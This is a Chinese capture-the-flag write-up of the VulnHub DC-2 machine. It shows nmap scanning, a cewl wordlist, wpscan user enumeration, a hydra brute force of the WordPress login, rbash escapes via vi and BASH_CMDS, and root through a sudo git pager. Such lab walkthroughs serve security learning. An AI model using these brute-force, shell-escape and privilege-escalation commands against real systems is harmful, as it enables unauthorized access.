0x00 前言
摆了好几天了,该开始学习了,先把摆之前没做完的DC2搞完,当时做到rbash部分,然后当时卡住了,今晚突然就一下子就逃逸出来了=.=,然后接下来就是很顺畅的拿到了root结束了这个靶机
0x01 靶机介绍
靶机难度:简单(https://github.com/Ignitetechnologies/CTF-Difficulty
靶机介绍:https://www.vulnhub.com/entry/dc-2,311/
介绍里有说要改hosts文件
(做之前记得改一下,方法百度)
这个靶机同样也是5个flag👻
0x02 信息收集
这里就把端口探测也并进来了
先找ip
1 | nmap -n -sn 192.168.189.0/24 |
然后对靶机进行端口探测
1 | nmap -sS -sV -O -p- 192.168.189.130 |
整合端口信息
1 | 80/tcp open http Apache httpd 2.4.10 ((Debian)) |
就俩端口,那直接从web口开始吧
0x03 获取shell
web的首页有flag1

1 | Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl. |
这里有提示利用cewl
工具来获取密码字典(kali自带此工具)(工具的介绍和用法在参考文章中有放)
1 | cewl http://dc-2 -w pass.txt |
同时我们可以发现这个网站是wordpress搭的,直接wpscan扫用户名(因为密码字典上边搞出来了,差用户名)
1 | wpscan --url dc-2 -e u |
将这三个作为用户名字典,再利用hydra
工具爆破
1 | hydra -L user.txt -P pass.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^:is incorrect' |
最后得到结果
jerry账户登录进去后可以看到flag2

1 | If you can't exploit WordPress and take a shortcut, there is another way. |
然后接下来在后台翻,没找到什么可以利用的地方,尝试用爆出来的账号密码去登录ssh(还一个ssh端口)
最后发现tom账户可以登录进去,拿到shell
0x04 权限提升
这里进去后发现tom的shell是rbash
,中文意思就是受限制的shell
上网找到这篇文章
利用其中的vi
命令来逃逸
1 | vim 1 |
可以看到这里我们的报错已经变成bash
了,cat
命令不能用,用/bin/cat
命令得到flag3
1 | Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes. |
(当然在rbash下用vi flag3.txt
或less flag3.txt
也能读取到flag3内容)
也可以利用BASH_CMDS
命令来逃逸rbash
1 | tom@DC-2:~$ BASH_CMDS[bilala]=/bin/sh |
逃逸出来后(还可以export环境变量,不过这里已经能用su命令了不用导入也没事),根据flag3的提示需要su
来切换用户
账号密码就是刚刚爆出的
1 | /bin/su - jerry |
在jerry的家目录下看到flag4
1 | Good to see that you've made it this far - but you're not home yet. |
sudo -l
查看jerry的sudo权限
发现给了git命令,结合flag4可知,可以git提权
1 | sudo git -p help |
得到root权限的shell后,在/root
中找到flag5
1 | __ __ _ _ _ _ |
(git提权的原理没找到文章,都只有告诉你提权操作==)
0x05 参考文章
cewl工具使用指南:https://www.freebuf.com/articles/network/190128.html
wpscan使用:https://xz.aliyun.com/t/2794
rbash逃逸:https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
rbash逃逸:https://blog.csdn.net/qq_43168364/article/details/111830233
git提权:https://blog.csdn.net/G_Fu_Q/article/details/116276096